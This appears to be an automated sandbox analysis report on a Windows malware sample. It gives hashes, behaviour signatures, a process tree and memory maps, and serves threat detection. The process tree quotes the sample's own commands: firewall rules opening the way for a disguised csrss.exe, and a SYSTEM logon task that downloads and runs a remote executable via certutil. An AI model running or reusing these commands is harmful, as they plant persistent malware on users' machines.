Analysis
-
max time kernel
32s -
max time network
164s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
23-05-2022 21:03
Static task
static1
Behavioral task
behavioral1
Sample
cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe
Resource
win10v2004-20220414-en
General
-
Target
cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe
-
Size
3.9MB
-
MD5
865660822e59b4e6dfbbc1558adc33bf
-
SHA1
327c98174279ecdd472ad263748723207293b704
-
SHA256
cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5
-
SHA512
4bfe2015c0d4d4c5ed1fa5860a207e635e8ea8bd639a47680a477ece2b861a7b83f227e5e5ec96145ff23784cdbf9fcd3e940c7af4d396ac66fa02be30835d17
Malware Config
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
svchost.exedescription pid process target process PID 4308 created 4440 4308 svchost.exe cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe -
Modifies Windows Firewall 1 TTPs
-
Modifies boot configuration data using bcdedit 1 IoCs
Processes:
bcdedit.exepid process 1656 bcdedit.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.execf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exedescription pid process target process PID 4724 set thread context of 4440 4724 cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe PID 2684 set thread context of 4580 2684 cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid process 4536 schtasks.exe 4648 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exepid process 4440 cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe 4440 cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exesvchost.exedescription pid process Token: SeDebugPrivilege 4440 cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe Token: SeImpersonatePrivilege 4440 cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe Token: SeTcbPrivilege 4308 svchost.exe Token: SeTcbPrivilege 4308 svchost.exe -
Suspicious use of WriteProcessMemory 23 IoCs
Processes:
cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exesvchost.execf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exedescription pid process target process PID 4724 wrote to memory of 4440 4724 cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe PID 4724 wrote to memory of 4440 4724 cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe PID 4724 wrote to memory of 4440 4724 cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe PID 4724 wrote to memory of 4440 4724 cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe PID 4724 wrote to memory of 4440 4724 cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe PID 4724 wrote to memory of 4440 4724 cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe PID 4724 wrote to memory of 4440 4724 cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe PID 4724 wrote to memory of 4440 4724 cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe PID 4724 wrote to memory of 4440 4724 cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe PID 4724 wrote to memory of 4440 4724 cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe PID 4308 wrote to memory of 2684 4308 svchost.exe cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe PID 4308 wrote to memory of 2684 4308 svchost.exe cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe PID 4308 wrote to memory of 2684 4308 svchost.exe cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe PID 2684 wrote to memory of 4580 2684 cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe PID 2684 wrote to memory of 4580 2684 cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe PID 2684 wrote to memory of 4580 2684 cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe PID 2684 wrote to memory of 4580 2684 cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe PID 2684 wrote to memory of 4580 2684 cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe PID 2684 wrote to memory of 4580 2684 cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe PID 2684 wrote to memory of 4580 2684 cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe PID 2684 wrote to memory of 4580 2684 cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe PID 2684 wrote to memory of 4580 2684 cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe PID 2684 wrote to memory of 4580 2684 cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe"C:\Users\Admin\AppData\Local\Temp\cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe"C:\Users\Admin\AppData\Local\Temp\cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe"C:\Users\Admin\AppData\Local\Temp\cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe"3⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe"C:\Users\Admin\AppData\Local\Temp\cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\f02377ff5b23\f02377ff5b23\f02377ff5b23.exe" enable=yes"5⤵
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe ""5⤵
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe ""6⤵
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://hotgifts.online/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F7⤵
- Creates scheduled task(s)
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F7⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"7⤵
-
C:\Windows\system32\bcdedit.exeC:\Windows\Sysnative\bcdedit.exe /v7⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes1⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\f02377ff5b23\f02377ff5b23\f02377ff5b23.exe" enable=yes1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exeFilesize
451KB
MD5a8141c48a5c4d6fa922a48ea52f2dfa1
SHA15fbf2a15ba1fa73c2e8dd9fa6a5788d46878fa29
SHA25679d74fe2cde63003726ac36009806c3132101e6e91781a68ac73ff21d91cb547
SHA51241861acb5e56b46efd8d5e921036e5d63e6f53306c815d57cfbc4ea2a4c0fe4a38f755c85798b0d35318497227a4344df3febfd27a1dadc16aeba8cfcd1f8b28
-
C:\Windows\rss\csrss.exeFilesize
548KB
MD5c5332ac2123f881a0706cb3c00159805
SHA1dce70dafe3920350e3d71f2cbd6b9a02a69b66c1
SHA25690e59203d3aafb2e3700a05a3947350be1eac5ac0db9acbc0b47dc21c27562c7
SHA512f97cc405c275e8281864a9d67823d918c4ff92200f81934c7a886a78056a2879eb43f44fc180e55ddd5de70937be6ad3d4d8216c38e61f3262494a7c59144125
-
C:\Windows\rss\csrss.exeFilesize
581KB
MD5a3ad9497b6c0cfad8f404d6857c9bcac
SHA1cbe94f26690d735d2b8939aa4410501b65dc4d37
SHA256715560cf4950ae3fcfbb87c849670166f1abf18a0ff5048ec5c3ad837c967b85
SHA512206b7a4b0f7ffa946ae115d1c2ffccd1553647c74de510ffe063cb309f4ce0b0bd49ddc019e33e058e68bea669c21a852d079bc4dbd0ab428fb0d1b86383de71
-
C:\Windows\rss\csrss.exeFilesize
486KB
MD5364a6e67d4dc7f6c2c10394690b67d13
SHA1cf0a083d8eabe8d7e4ebee5fc17c59640758e3aa
SHA2563b671ed045aaa7f3128e9c7e32bbb84dd710810c7833322b3accb484f13426b8
SHA512f95db26c1ad2908090c73142d90efae9c3b64dccfe95881cb37f447cc8761e2ade3e32c29cb02bcc83c2e21e5be7612923e25321e499731c087422074448d5c3
-
memory/1176-160-0x0000000000000000-mapping.dmp
-
memory/1308-155-0x0000000002A00000-0x0000000002DA6000-memory.dmpFilesize
3.6MB
-
memory/1308-148-0x0000000000000000-mapping.dmp
-
memory/1656-162-0x0000000000000000-mapping.dmp
-
memory/2684-137-0x0000000000000000-mapping.dmp
-
memory/2684-138-0x0000000002597000-0x000000000293D000-memory.dmpFilesize
3.6MB
-
memory/3176-144-0x0000000000000000-mapping.dmp
-
memory/3600-143-0x0000000000000000-mapping.dmp
-
memory/4140-145-0x0000000000000000-mapping.dmp
-
memory/4440-133-0x0000000000400000-0x0000000000B0F000-memory.dmpFilesize
7.1MB
-
memory/4440-131-0x0000000000000000-mapping.dmp
-
memory/4440-136-0x0000000000400000-0x0000000000B0F000-memory.dmpFilesize
7.1MB
-
memory/4440-135-0x0000000000400000-0x0000000000B0F000-memory.dmpFilesize
7.1MB
-
memory/4536-158-0x0000000000000000-mapping.dmp
-
memory/4560-146-0x0000000000000000-mapping.dmp
-
memory/4580-147-0x0000000000400000-0x0000000000B0F000-memory.dmpFilesize
7.1MB
-
memory/4580-139-0x0000000000000000-mapping.dmp
-
memory/4648-157-0x0000000000000000-mapping.dmp
-
memory/4724-130-0x00000000026A6000-0x0000000002A4C000-memory.dmpFilesize
3.6MB
-
memory/4724-132-0x0000000002A50000-0x0000000003145000-memory.dmpFilesize
7.0MB
-
memory/4768-159-0x0000000000400000-0x0000000000B0F000-memory.dmpFilesize
7.1MB
-
memory/4768-151-0x0000000000000000-mapping.dmp